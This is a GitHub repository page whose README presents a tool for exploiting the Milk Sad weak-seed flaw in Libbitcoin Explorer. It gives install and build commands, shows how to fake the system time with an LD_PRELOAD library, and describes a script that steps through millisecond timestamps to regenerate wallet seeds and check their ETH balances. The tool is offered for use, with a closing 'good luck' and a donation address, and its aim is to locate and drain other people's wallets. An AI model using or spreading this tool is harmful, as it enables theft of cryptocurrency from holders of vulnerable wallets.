Skip to content

JanetCohen/MILK-SAD-Libbitcoin-vuln-exploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 
 
 
 
 

Repository files navigation

MILK-SAD-Libbitcoin-vuln-exploit

I saw this https://milksad.info/disclosure.html then I did some experiments , I made an automatic program above and I added some logic, namely searching in +1 in mili seconds, because that affects the resulting seed I haven't tried it in nanoseconds,micro second,If you want to experiment again you can edit faketime.c above.This program only focuses on ETH and implements a balance check.and if you want to do it in a different time epoch you can edit in this section

   epoch_time = 1608145450000

in milisecond format and the original 16 December 2020, 13:44:10.000 (UTC) how to install it

git clone https://github.com/JanetCohen/MILK-SAD-Libbitcoin-vuln-exploit
cd MILK-SAD-Libbitcoin-vuln-exploit
pip install requests
pip install mnemonic
pip install eth_account
pip install bip32utils
gcc -shared -fPIC -o libfaketime_ms.so faketime.c -ldl
chmod +x bxl

a little addition, this file is the vulnerable Libbitcoin Explorer,

is the program running properly?

If you want to test whether the Python program is really running well, you can try this.

echo "$(date +'%s')$(date +'%3N') - Running command..." && ./bxl seed -b 128 | ./bxl mnemonic-new

This will display the current epoc time. You can copy the result Example output

1732470374822 - Running command...                             
vicious replace embrace immune chat scan tattoo pottery tomato bridge hurdle turkey

And this bxl is the original libbitcoin program itself without modification.

Epoc 1732470374822 Add here

export FAKETIME_MS="1732470374822" 

export LD_PRELOAD="./libfaketime.so"

This means you have faked your system time. You can prove it by running this,if you don't do this and just validate in python, it will show a different seed because the echo command delays a few milliseconds to print the epoc time

echo "$(date +'%s')$(date +'%3N') - Running command..." && ./bxl seed -b 128 | ./bxl mnemonic-new

command again. If the result is the same as the previous result it means it is running correctly.

Then you can validate again in the python script by changing this

epoch_time = 1732470374822

In line 50 Then run it, is the result the same again? If it is the same, it runs correctly.

You can reset your system time to its original state with this.

unset LD_PRELOAD
unset FAKETIME_MS

good luck

some vodka : bc1qm3dzv2pkr67d0mknwt2xp95pux3d6kkufym9xr

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published